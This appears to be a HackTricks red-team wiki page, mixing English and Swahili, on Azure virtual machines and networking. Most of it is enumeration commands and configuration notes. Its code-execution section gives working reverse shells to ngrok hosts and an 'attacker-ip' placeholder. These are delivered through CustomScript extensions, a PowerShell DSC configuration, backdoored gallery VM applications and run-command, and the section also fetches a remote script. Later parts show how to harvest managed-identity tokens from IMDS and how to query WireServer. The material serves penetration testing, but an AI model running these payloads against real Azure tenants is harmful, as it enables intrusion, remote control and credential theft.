Az - Virtual Machines & Network

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Azure Networking Basic Info

Azure networks contains different entities and ways to configure it. You can find a brief descriptions, examples and enumeration commands of the different Azure network entities in:

Az - Azure Network

VMs Basic information

Azure Virtual Machines (VMs) are flexible, on-demand cloud-based servers that let you run Windows or Linux operating systems. They allow you to deploy applications and workloads without managing physical hardware. Azure VMs can be configured with various CPU, memory, and storage options to meet specific needs and integrate with Azure services like virtual networks, storage, and security tools.

Security Configurations

  • Availability Zones: Availability zones are distinct groups of datacenters within a specific Azure region which are physically separated to minimize the risk of multiple zones being affected by local outages or disasters.
  • Security Type:
  • Standard Security: This is the default security type that does not require any specific configuration.
  • Trusted Launch: This security type enhances protection against boot kits and kernel-level malware by using Secure Boot and Virtual Trusted Platform Module (vTPM).
  • Confidential VMs: On top of a trusted launch, it offers hardware-based isolation between the VM, hypervisor and host management, improves the disk encryption and more.
  • Authentication: By default a new SSH key is generated, although itā€™s possible to use a public key or use a previous key and the username by default is azureuser. Itā€™s also possible to configure to use a password.
  • VM disk encryption: The disk is encrypted at rest by default using a platform managed key.
  • Itā€™s also possible to enable Encryption at host, where the data will be encrypted in the host before sending it to the storage service, ensuring an end-to-end encryption between the host and the storage service (docs).
  • NIC network security group:
  • None: Basically opens every port
  • Basic: Allows to easily open the inbound ports HTTP (80), HTTPS (443), SSH (22), RDP (3389)
  • Advanced: Select a security group
  • Backup: Itā€™s possible to enable Standard backup (one a day) and Enhanced (multiple per day)
  • Patch orchestration options: This enable to automatically apply patches in the VMs according to the selected policy as described in the docs.
  • Alerts: Itā€™s possible to automatically get alerts by email or mobile app when something happen in the VM. Default rules:
  • Percentage CPU is greater than 80%
  • Available Memory Bytes is less than 1GB
  • Data Disks IOPS Consumed Percentage is greater than 95%
  • OS IOPS Consumed Percentage is greater than 95%
  • Network in Total is greater than 500GB
  • Network Out Total is greater than 200GB
  • VmAvailabilityMetric is less than 1
  • Heath monitor: By default check protocol HTTP in port 80
  • Locks: It allows to lock a VM so it can only be read (ReadOnly lock) or it can be read and updated but not deleted (CanNotDelete lock).
  • Most VM related resources also support locks like disks, snapshotsā€¦
  • Locks can also be applied at resource group and subscription levels

Disks & snapshots

  • Itā€™s possible to enable to attach a disk to 2 or more VMs
  • By default every disk is encrypted with a platform key.
  • Same in snapshots
  • By default itā€™s possible to share the disk from all networks, but it can also be restricted to only certain private access or to completely disable public and private access.
  • Same in snapshots
  • Itā€™s possible to generate a SAS URI (of max 60days) to export the disk, which can be configured to require authentication or not
  • Same in snapshots
# List all disks
az disk list --output table

# Get info about a disk
az disk show --name <disk-name> --resource-group <rsc-group>

Images, Gallery Images & Restore points

A VM image ni template ambayo ina mfumo wa uendeshaji, mipangilio ya application na filesystem inayohitajika ili create a new virtual machine (VM). Tofauti kati ya image na disk snapshot ni kwamba disk snapshot ni nakala ya point-in-time ya single managed disk, ya read-only, inayotumika hasa kwa backup au troubleshooting, wakati image inaweza kuwa na multiple disks na imeundwa kutumika kama template kwa kucreate new VMs.
Images zinaweza kusimamiwa katika Images section ya Azure au ndani ya Azure compute galleries ambayo inaruhusu kutengeneza versions na kushare image cross-tenant au hata kuifanya public.

A restore point huhifadhi VM configuration na point-in-time application-consistent snapshots of all the managed disks zilizounganishwa na VM. Inahusiana na VM na lengo lake ni kuwezesha kurestore hiyo VM iwe jinsi ilivyokuwa katika point hiyo maalum kwa wakati huo.

# Shared Image Galleries | Compute Galleries
## List all galleries and get info about one
az sig list --output table
az sig show --gallery-name <name> --resource-group <rsc-group>

## List all community galleries
az sig list-community --output table

## List galleries shaerd with me
az sig list-shared --location <location> --output table

## List all image definitions in a gallery and get info about one
az sig image-definition list --gallery-name <name> --resource-group <rsc-group> --output table
az sig image-definition show --gallery-image-definition <name> --gallery-name <gallery-name> --resource-group <rsc-group>

## List all the versions of an image definition in a gallery
az sig image-version list --gallery-image-name <image-name> --gallery-name <gallery-name> --resource-group <rsc-group --output table

## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table

# Images
# List all managed images in your subscription
az image list --output table

# Restore points
## List all restore points and get info about 1
az restore-point collection list-all --output table
az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>

Azure Site Recovery

Kutoka kwa docs: Site Recovery husaidia kuhakikisha business continuity kwa kuweka business apps na workloads zinaendelea kukimbia wakati wa outages. Site Recovery inareplicate workloads zinazokimbia kwenye physical na virtual machines (VMs) kutoka primary site hadi secondary location. Wakati outage inapotokea kwenye primary site yako, unafanya fail over kwenda secondary location, na kufikia apps kutoka huko. Baada ya primary location kuanza kufanya kazi tena, unaweza kufanya fail back kwenda humo.

Azure Bastion

Azure Bastion huwezesha secure na seamless Remote Desktop Protocol (RDP) na Secure Shell (SSH) access kwa virtual machines zako (VMs) moja kwa moja kupitia Azure Portal au kupitia jump box. Kwa kuondoa hitaji la public IP addresses kwenye VMs zako.

Bastion hu-deploy subnet inayoitwa AzureBastionSubnet yenye /26 netmask kwenye VNet ambayo inahitaji kufanya kazi juu yake. Kisha, inaruhusu kuconnect kwa internal VMs kupitia browser kwa kutumia RDP na SSH huku ikiepuka kufichua ports za VMs kwa Internet. Inaweza pia kufanya kazi kama jump host.

Ili kuorodhesha hosts zote za Azure Bastion kwenye subscription yako na kuconnect kwa VMs kupitia hizo, unaweza kutumia amri zifuatazo:

# List bastions
az network bastion list -o table

# Connect via SSH through bastion
az network bastion ssh \
--name MyBastion \
--resource-group MyResourceGroup \
--target-resource-id /subscriptions/12345678-1234-1234-1234-123456789abc/resourceGroups/MyResourceGroup/providers/Microsoft.Compute/virtualMachines/MyVM \
--auth-type ssh-key \
--username azureuser \
--ssh-key ~/.ssh/id_rsa

# Connect via RDP through bastion
az network bastion rdp \
--name <BASTION_NAME> \
--resource-group <RESOURCE_GROUP> \
--target-resource-id /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/virtualMachines/<VM_NAME> \
--auth-type password \
--username <VM_USERNAME> \
--password <VM_PASSWORD>

Metadata

Azure Instance Metadata Service (IMDS) hutoa taarifa kuhusu running virtual machine instances ili kusaidia usimamizi na usanidi wake. Inatoa maelezo kama vile SKU, storage, network configurations, na taarifa kuhusu upcoming maintenance events kupitia REST API inayopatikana kwenye non-routable IP address 169.254.169.254, ambayo inapatikana tu kutoka ndani ya VM. Mawasiliano kati ya VM na IMDS hubaki ndani ya host, kuhakikisha secure access. Unapouliza IMDS, HTTP clients ndani ya VM zinapaswa bypass web proxies ili kuhakikisha mawasiliano sahihi.

Zaidi ya hayo, ili kuwasiliana na metadata endpoint, HTTP request lazima iwe na header Metadata: true na haipaswi kuwa na header X-Forwarded-For.

Unapoomba access token kwa metadata endpoint, kwa default metadata service itatumia system assigned managed identity kutengeneza token, ikiwa kuna system assigned managed identity yoyote. Ikiwa kuna ONE user assigned managed identity tu, basi hii itatumika kwa default. Hata hivyo, ikiwa hakuna system assigned managed identity na kuna multiple user assigned managed identities, basi metadata service itarudisha error inayoonyesha kuwa kuna multiple managed identities na ni lazima ubainishe ni ipi ya kutumia.

Angalia jinsi ya kui-enumerate katika:

Cloud SSRF - HackTricks

VM Enumeration

# VMs
## List all VMs and get info about one
az vm list --output table
az vm show --name <came> --resource-group <rsc-group>

## List all available VM images and get info about one
az vm image list --all --output table

# VM Extensions
## List all VM extensions
az vm extension image list --output table

## Get extensions by publisher
az vm extension image list --publisher "Site24x7" --output table

## List extensions in a VM
az vm extension list -g <rsc-group> --vm-name <vm-name>

## List managed identities in a VM
az vm identity show \
--resource-group <rsc-group> \
--name <vm-name>

# Disks
## List all disks and get info about one
az disk list --output table
az disk show --name <disk-name> --resource-group <rsc-group>

# Snapshots
## List all galleries abd get info about one
az sig list --output table
az sig show --gallery-name <name> --resource-group <rsc-group>

## List all snapshots and get info about one
az snapshot list --output table
az snapshot show --name <name> --resource-group <rsc-group>

# Shared Image Galleries | Compute Galleries
## List all galleries and get info about one
az sig list --output table
az sig show --gallery-name <name> --resource-group <rsc-group>

## List all community galleries
az sig list-community --output table

## List galleries shared with me
az sig list-shared --location <location> --output table

## List all image definitions in a gallery and get info about one
az sig image-definition list --gallery-name <name> --resource-group <rsc-group> --output table
az sig image-definition show --gallery-image-definition <name> --gallery-name <gallery-name> --resource-group <rsc-group>

## List all the versions of an image definition in a gallery
az sig image-version list --gallery-image-name <image-name> --gallery-name <gallery-name> --resource-group <rsc-group --output table

## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table

# Images
# List all managed images in your subscription
az image list --output table

# Restore points
## List all restore points and get info about 1
az restore-point collection list-all --output table
az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>

# Bastion
## list all bastions
az network bastion list -o table

# Network
## List VNets
az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}"

## List subnets of a VNet
az network vnet subnet list --resource-group <ResourceGroupName> --vnet-name <VNetName> --query "[].{name:name, addressPrefix:addressPrefix}" -o table

## List public IPs
az network public-ip list --output table

## Get NSG rules
az network nsg rule list --nsg-name <NSGName> --resource-group <ResourceGroupName> --query "[].{name:name, priority:priority, direction:direction, access:access, protocol:protocol, sourceAddressPrefix:sourceAddressPrefix, destinationAddressPrefix:destinationAddressPrefix, sourcePortRange:sourcePortRange, destinationPortRange:destinationPortRange}" -o table

## Get NICs and subnets using this NSG
az network nsg show --name MyLowCostVM-nsg --resource-group Resource_Group_1 --query "{subnets: subnets, networkInterfaces: networkInterfaces}"

## List all Nics & get info of a single one
az network nic list --output table
az network nic show --name <name> --resource-group <rsc-group>

## List Azure Firewalls
az network firewall list --query "[].{name:name, location:location, subnet:subnet, publicIp:publicIp}" -o table

## Get network rules of a firewall
az network firewall network-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table

## Get application rules of a firewall
az network firewall application-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table

## Get nat rules of a firewall
az network firewall nat-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table

## List Route Tables
az network route-table list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table

## List routes for a table
az network route-table route list --route-table-name <RouteTableName> --resource-group <ResourceGroupName> --query "[].{name:name, addressPrefix:addressPrefix, nextHopType:nextHopType, nextHopIpAddress:nextHopIpAddress}" -o table

# Misc
## List all virtual machine scale sets
az vmss list --output table

## List all availability sets
az vm availability-set list --output table

## List all load balancers
az network lb list --output table

## List all storage accounts
az storage account list --output table

## List all custom script extensions on a specific VM
az vm extension list --vm-name <vm-name> --resource-group <resource-group>

# Show boot diagnostics settings for a specific VM
az vm boot-diagnostics get-boot-log --name <vm-name> --resource-group <resource-group>

## List all tags on virtual machines
az resource list --resource-type "Microsoft.Compute/virtualMachines" --query "[].{Name:name, Tags:tags}" --output table

# List all available run commands for virtual machines
az vm run-command list --output table

Code Execution in VMs

VM Extensions

Azure VM extensions ni applications ndogo zinazo provide post-deployment configuration na automation tasks kwenye Azure virtual machines (VMs).

Hii ingewezesha execute arbitrary code inside VMs.

The required permission ni Microsoft.Compute/virtualMachines/extensions/write.

Inawezekana kuorodhesha extensions zote zinazopatikana kwa:

# It takes some mins to run
az vm extension image list --output table

# Get extensions by publisher
az vm extension image list --publisher "Site24x7" --output table

Inawezekana kuendesha custom extensions zinazotekeleza custom code:

  • Tekeleza revers shell
# Prepare the rev shell
echo -n 'bash -i  >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ==

# Execute rev shell
az vm extension set \
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{}' \
--protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
  • Tekeleza script iliyo kwenye internet
az vm extension set \
--resource-group rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
--protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'

Viendelezi muhimu vya VM

Ruhusa inayohitajika bado ni Microsoft.Compute/virtualMachines/extensions/write.

Kiendelezi cha VMAccess

Kiendelezi hiki kinaruhusu kubadilisha nenosiri (au kuunda ikiwa halipo) la watumiaji ndani ya Windows VMs.

# Run VMAccess extension to reset the password
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
DesiredStateConfiguration (DSC)

Hii ni VM extension ya Microsoft ambayo hutumia PowerShell DSC kusimamia configuration ya Azure Windows VMs. Kwa hiyo, inaweza kutumika kuexecute arbitrary commands kwenye Windows VMs kupitia extension hii:

# Content of revShell.ps1
Configuration RevShellConfig {
Node localhost {
Script ReverseShell {
GetScript = { @{} }
SetScript = {
$client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length)
}
$client.Close()
}
TestScript = { return $false }
}
}
}
RevShellConfig -OutputPath .\Output

# Upload config to blob
$resourceGroup = 'dscVmDemo'
$storageName = 'demostorage'
Publish-AzVMDscConfiguration `
-ConfigurationPath .\revShell.ps1 `
-ResourceGroupName $resourceGroup `
-StorageAccountName $storageName `
-Force

# Apply DSC to VM and execute rev shell
$vmName = 'myVM'
Set-AzVMDscExtension `
-Version '2.76' `
-ResourceGroupName $resourceGroup `
-VMName $vmName `
-ArchiveStorageAccountName $storageName `
-ArchiveBlobName 'revShell.ps1.zip' `
-AutoUpdate `
-ConfigurationName 'RevShellConfig'
Hybrid Runbook Worker

Hii ni VM extension ambayo ingeruhusu execute runbooks kwenye VMs kutoka automation account. Kwa maelezo zaidi angalia Automation Accounts service.

VM Applications

Hizi ni packages zilizo na data zote za application na install na uninstall scripts ambazo zinaweza kutumika kwa urahisi kuongeza na kuondoa application katika VMs.

# List all galleries in resource group
az sig list --resource-group <res-group> --output table

# List all apps in a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table

Hizi ni paths ambapo applications hupakuliwa ndani ya file system:

  • Linux: /var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux/<appname>/<app version>
  • Windows: C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\<appname>\<app version>

Angalia jinsi ya kusakinisha applications mpya katika https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli

Caution

Inawezekana kushiriki apps za mtu mmoja mmoja na galleries na subscriptions au tenants wengine. Hii ni ya kuvutia sana kwa sababu inaweza kumruhusu attacker kuweka backdoor kwenye application na pivot kwenda subscriptions na tenants nyingine.

Lakini hakuna ā€œmarketplaceā€ kwa vm apps kama ilivyo kwa extensions.

Permissions zinazohitajika ni:

  • Microsoft.Compute/galleries/applications/write
  • Microsoft.Compute/galleries/applications/versions/write
  • Microsoft.Compute/virtualMachines/write
  • Microsoft.Network/networkInterfaces/join/action
  • Microsoft.Compute/disks/write

Mfano wa exploitation wa kutekeleza arbitrary commands:

# Create gallery (if the isn't any)
az sig create --resource-group myResourceGroup \
--gallery-name myGallery --location "West US 2"

# Create application container
az sig gallery-application create \
--application-name myReverseShellApp \
--gallery-name myGallery \
--resource-group <rsc-group> \
--os-type Linux \
--location "West US 2"

# Create app version with the rev shell
## In Package file link just add any link to a blobl storage file
az sig gallery-application version create \
--version-name 1.0.2 \
--application-name myReverseShellApp \
--gallery-name myGallery \
--location "West US 2" \
--resource-group <rsc-group> \
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
--install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"

# Install the app in a VM to execute the rev shell
## Use the ID given in the previous output
az vm application set \
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true

Data ya mtumiaji

Hii ni data ya kudumu ambayo inaweza kupatikana kutoka kwa metadata endpoint wakati wowote. Kumbuka katika Azure user data ni tofauti na AWS na GCP kwa sababu ukiweka script hapa haitekelezwi kwa default.

Data maalum

Inawezekana kupitisha baadhi ya data kwa VM ambayo itahifadhiwa katika paths zinazotarajiwa:

  • Katika Windows custom data huwekwa katika %SYSTEMDRIVE%\AzureData\CustomData.bin kama faili ya binary na haichakatwi.
  • Katika Linux iliwekwa katika /var/lib/waagent/ovf-env.xml na sasa imehifadhiwa katika /var/lib/waagent/CustomData/ovf-env.xml
  • Linux agent: Haichakuwi custom data kwa default, image maalum yenye data iliyowezeshwa inahitajika
  • cloud-init: Kwa default huichakata custom data na data hii inaweza kuwa katika formats kadhaa. Inaweza kutekeleza script kwa urahisi kwa kutuma tu script ndani ya custom data.
  • Nilijaribu kwamba Ubuntu na Debian zote zinaexecute script unayoweka hapa.
  • Pia si lazima kuwezesha user data ili hii itekelezwe.
#!/bin/sh
echo "Hello World" > /var/tmp/output.txt

Endesha Amri

Hii ni njia ya msingi zaidi ambayo Azure hutoa ili kutekeleza amri zozote katika VMs. Ruhusa inayohitajika ni Microsoft.Compute/virtualMachines/runCommand/action.

# Execute rev shell
az vm run-command invoke \
--resource-group <rsc-group> \
--name <vm-name> \
--command-id RunShellScript \
--scripts @revshell.sh

# revshell.sh file content
echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh

Azure WireServer & GoalState

Azure VMs hutoa internal platform endpoints zinazotumika kwa configuration, metadata retrieval na identity management. Kuelewa tofauti kati yao ni muhimu sana kwa enumeration, privilege escalation na post-exploitation.

Wire Server (Azure Fabric Endpoint)

Azure WireServer ni internal Azure IP (168.63.129.16) inayotumiwa na platform kuwasiliana na VM.

Inawajibika kwa:

  • Communication na VM Agent
  • Delivering:
  • GoalState
  • ExtensionsConfig
  • Internal VM configuration (ikiwa ni pamoja na identities)
  • DHCP & DNS services
  • Health monitoring

GoalState & ExtensionsConfig

GoalState inawakilisha desired configuration of the VM kama ilivyofafanuliwa na Azure. Inaweza kujumuisha:

  • Extensions configuration
  • Managed identities
  • Provisioning state
  • Agent instructions

ExtensionsConfig ina configuration ya kina ya VM extensions na inaweza kujumuisha:

  • User Assigned Managed Identities
  • Extension settings
  • Secrets (kulingana na extension)

These endpoints are typically accessed via:

curl -H "x-ms-version: 2012-11-30" http://168.63.129.16/machine?comp=goalstate

Mazingatio ya ufikiaji

IP ya WireServer kwa ujumla inaweza kufikiwa kutoka ndani ya VM kupitia guest network stack. Haizuiliwi tu kwa Azure VM Agent, Run Command, au VM extensions. Microsoft hata inaandika mifano ya agentless Linux provisioning ambapo scripts za kawaida ndani ya guest huuliza GoalState moja kwa moja kutoka 168.63.129.16.

Hata hivyo, si kila process itapata matokeo sawa kiutendaji:

  • Baadhi ya endpoints zinahitaji Azure-specific headers, kama x-ms-version: 2012-11-30 kwa GoalState.
  • Local guest controls zinaweza kuzuia au kubadilisha access, ikiwemo host firewall rules, proxies, routes, network namespaces, containers, au endpoint protection.
  • VM extensions na Run Command mara nyingi hujiendesha kama root/SYSTEM kupitia VM Agent, hivyo zinaweza kupita local OS restrictions zinazomgusa user wa kawaida anayeingiliana moja kwa moja.
  • Baadhi ya data ni agent/extension-specific na inaweza kutegemea provisioning state ya VM, agent uliosakinishwa, extensions zilizosetiwa, au managed identity configuration.

Kwa hiyo, ikiwa request inafanya kazi kutoka Run Command lakini inashindikana kutoka SSH, maelezo ya kawaida ni tofauti ya OS user, environment, routing, proxy, firewall, au namespace, si sheria ya jumla ya Azure kwamba ni contexts za agent pekee zinazoweza kufikia 168.63.129.16.

Katika majaribio ya lab utofauti huu ulikuwa wazi: utekelezaji wa Linux/Windows VM Agent kupitia Run Command au Custom Script extensions uliweza kufikia GoalState kwenye 168.63.129.16, ilhali session ya kawaida ya SSH kwenye Linux VM nyingine bado iliweza kufikia IMDS lakini ili-timeout ilipouliza GoalState. Tumia WireServer/GoalState kama kitu chenye manufaa lakini kinachotegemea environment; usitegemee kama njia ya msingi ya kuorodhesha managed identities.

Managed Identity Access Kutoka Ndani ya VM

Njia ya kuaminika ya kutumia managed identities za VM ni IMDS managed identity endpoint kwenye 169.254.169.254, si WireServer ExtensionsConfig XML. Scripts zinazotafuta tu UserAssignedIdentity nodes ndani ya ExtensionsConfig si za kuaminika kwa sababu:

  • Assignment ya managed identity ya VM haijahakikishwa kuwakilishwa kama UserAssignedIdentity nodes ndani ya extension XML.
  • Zinakosa system-assigned managed identities.
  • Zinapata user-assigned identities tu ikiwa current GoalState/extension data kwa bahati itaonyesha XML shape inayotarajiwa.

Mfumo wa usalama uliodokumentishwa na Microsoft ni kwamba code yote inayoendeshwa kwenye VM inaweza kuomba tokens kwa managed identities zinazopatikana kwenye VM hiyo. Hii ilithibitishwa kutoka:

  • Linux SSH kama VM user wa kawaida.
  • Linux Run Command kupitia VM Agent.
  • Linux Custom Script extension kupitia VM Agent.
  • Windows Custom Script extension kama NT AUTHORITY\SYSTEM.

Katika contexts zote hizo, IMDS iliweza kutoa tokens kwa Management, Microsoft Graph/Entra ID, Key Vault, na Storage wakati identity iliyoombwa ilikuwa inapatikana kwa VM.

Kuna matatizo mawili tofauti ambayo ni rahisi kuchanganya:

  • Kupata token kwa identity inayojulikana: Ikiwa identity imewekwa kwenye VM, IMDS inaweza kutoa tokens kwa audiences tofauti kama https://management.azure.com/, https://graph.microsoft.com/, https://vault.azure.net, na https://storage.azure.com/. Ikiwa kuna user-assigned identities kadhaa, omba maalum moja kwa client_id, object_id, au msi_res_id.
  • Kugundua kila identity iliyoambatanishwa kutoka ndani ya VM: IMDS haitoi endpoint rahisi ya ā€œlist all identitiesā€. Njia ya vitendo ni kupata default Management token, kusoma VM resource kupitia ARM, na kuchunguza property identity. Hii hufanya kazi tu ikiwa managed identity hiyo ina permissions kama Microsoft.Compute/virtualMachines/read kwenye VM. Ikiwa ARM itarudisha 403, token bado inaweza kuwa halali na yenye manufaa, lakini haiwezi kuorodhesha orodha kamili ya identities za VM.

Ikiwa ARM discovery itashindikana, bado unaweza kujaribu WireServer/HostGAPlugin sources kama GoalState na http://168.63.129.16:32526/vmSettings kutafuta fields zinazoonekana kama identity (clientId, IdentityClientId, msi_res_id, user-assigned identity resource IDs) kisha uombe IMDS tokens ukitumia selectors hizo. Hii ni fallback, si guarantee: endpoints hizo hutegemea context na huenda zisionyeshe managed identity selectors kabisa.

Mifano ifuatayo kwanza huomba token. Kisha hujaribu kusoma VM resource kutoka Azure Resource Manager na kuchapisha property yake identity. Hatua ya pili hufanya kazi tu ikiwa managed identity ina permissions kama Microsoft.Compute/virtualMachines/read kwenye VM.

#!/usr/bin/env bash
set -euo pipefail

imds="http://169.254.169.254/metadata"
api_version="2021-02-01"
resource="${1:-https://management.azure.com/}"

# Optional. Examples:
#   export MSI_SELECTOR='client_id=<client-id>'
#   export MSI_SELECTOR='object_id=<principal-id>'
#   export MSI_SELECTOR='msi_res_id=/subscriptions/.../userAssignedIdentities/name'
selector="${MSI_SELECTOR:-}"

urlencode() {
python3 -c 'import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1], safe=""))' "$1"
}

token_url="$imds/identity/oauth2/token?api-version=$api_version&resource=$(urlencode "$resource")"
if [[ -n "$selector" ]]; then
token_url="$token_url&$selector"
fi

echo "[*] Requesting managed identity token for: $resource"
token_json="$(curl -fsS --noproxy "*" -H "Metadata:true" "$token_url")"

access_token="$(
TOKEN_JSON="$token_json" python3 - <<'PY'
import json, os
print(json.loads(os.environ["TOKEN_JSON"])["access_token"])
PY
)"

TOKEN="$access_token" python3 - <<'PY'
import base64, json, os

token = os.environ["TOKEN"]
payload = token.split(".")[1]
payload += "=" * (-len(payload) % 4)
claims = json.loads(base64.urlsafe_b64decode(payload))

print("[+] Token acquired")
for key in ("tid", "appid", "oid", "xms_mirid"):
if key in claims:
print(f"    {key}: {claims[key]}")
PY

echo "[*] Trying to read the VM identity property through ARM..."
compute_json="$(curl -fsS --noproxy "*" -H "Metadata:true" "$imds/instance/compute?api-version=$api_version")"
vm_id="$(
COMPUTE_JSON="$compute_json" python3 - <<'PY'
import json, os
print(json.loads(os.environ["COMPUTE_JSON"])["resourceId"])
PY
)"

arm_url="https://management.azure.com${vm_id}?api-version=2024-07-01"
if vm_json="$(curl -fsS -H "Authorization: Bearer $access_token" "$arm_url" 2>/dev/null)"; then
VM_JSON="$vm_json" python3 - <<'PY'
import json, os
vm = json.loads(os.environ["VM_JSON"])
print(json.dumps(vm.get("identity", {}), indent=2))
PY
else
echo "[-] Could not read the VM resource with this identity. The token may still be valid, but it lacks ARM read permissions on the VM."
fi

Privilege Escalation

Az - Virtual Machines & Network Privesc

Unauthenticated Access

Az - VMs Unauth

Post Exploitation

Az - VMs & Network Post Exploitation

Persistence

Az - VMs Persistence

References

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks